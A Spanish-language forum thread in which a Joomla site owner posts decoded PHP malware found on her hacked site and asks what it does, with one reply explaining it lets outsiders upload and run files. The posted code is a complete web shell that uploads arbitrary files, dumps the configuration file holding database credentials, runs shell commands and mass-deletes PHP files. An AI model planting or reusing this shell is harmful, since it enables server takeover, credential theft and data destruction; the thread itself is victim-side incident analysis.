Foros del Web » Programando para Internet » PHP »

Web Hackeada con este código.. ¿alguien me lo explica?

Estas en el tema de Web Hackeada con este código.. ¿alguien me lo explica? en el foro de PHP en Foros del Web. Buenos dias. Soy muy novata en el php... sin embargo utilizo Joomla para crear mis webs. Mi problema es que desde hace un tiempo me ...
  #1 (permalink)  
Antiguo 23/10/2013, 01:07
 
Fecha de Ingreso: noviembre-2007
Mensajes: 1
Antigüedad: 16 años, 5 meses
Puntos: 0
Pregunta Web Hackeada con este código.. ¿alguien me lo explica?

Buenos dias.
Soy muy novata en el php... sin embargo utilizo Joomla para crear mis webs.
Mi problema es que desde hace un tiempo me están hackeando una de ellas. Encontré un archivo php supuestamente malicioso y pude decodificarlo en Base64. El resultado es lo que escribo a continuación... pero no sé interpretarlo.
Alguna idea que me ayude a eliminar dichos virus en mi sistema? Gracias a todos por vuestro tiempo... ahí va el codigo:

error_reporting(0);
echo "<title>+[ Joomla is Free ]+</title>";
$os = php_uname();
echo "<center> Info-Kang:".$os." </center>";
if (!empty($_FILES)) {
$tempFile = $_FILES['Fileupload']['tmp_name'];
$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['kemana'] . '/';
$targetFile = str_replace('//','/',$targetPath) . $_FILES['Fileupload']['name'];
move_uploaded_file($tempFile,$targetFile);
echo "1";
}
if(isset($_GET['read'])){
$conf = file_get_contents("../../configuration.php");
echo $conf;
}
echo "<pre><font size=3 color=#000000>".shell_exec('echo KcB#`pwd`#KcB; ls -lia; rm -f *.gif')."</font></pre>";
if(isset($_GET['patch'])){
$deljce = '../../components/com_jce/jce.php';
unlink($deljce);
}
if(isset($_GET['del'])){
$mask = "*.php";
array_map( "unlink", glob( $mask ) );
echo "<pre><font size=3 color=#000000>".shell_exec('rm -f *.php')."</font></pre>";
}
  #2 (permalink)  
Antiguo 23/10/2013, 10:46
Avatar de haggenx  
Fecha de Ingreso: febrero-2007
Ubicación: México
Mensajes: 823
Antigüedad: 17 años, 2 meses
Puntos: 24
Respuesta: Web Hackeada con este código.. ¿alguien me lo explica?

wow, esto es grave!!!! , según entiendo este archivo te lo colocaron en tu servidor, por lo que tienes problemas de seguridad en el mismo, revisa con tu proveedor para que mejoren la seguridad del mismo.
No se como se distribuya dicho archivo, quizá mediante algún método automático, pero lo que hace es que permite que un usuario cualquiera (con solo ver tu web y obviamente el archivo en cuestión) suba archivos a tu servidor y entonces se ejecuten, por lo que también hay problemas con los tipos de archivos que puede ejecutar tu servidor.
Normalmente en xampp en su versión en local puede ejecutar archivos bat (yo lo he hecho) pero eso no debería ocurrir en un servidor en la red.
__________________
Mi blog informático http://marjuanm.blogspot.mx
Fanpage del blog https://www.facebook.com/pages/Mis-p...36397183215592

Etiquetas: Ninguno
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 07:52.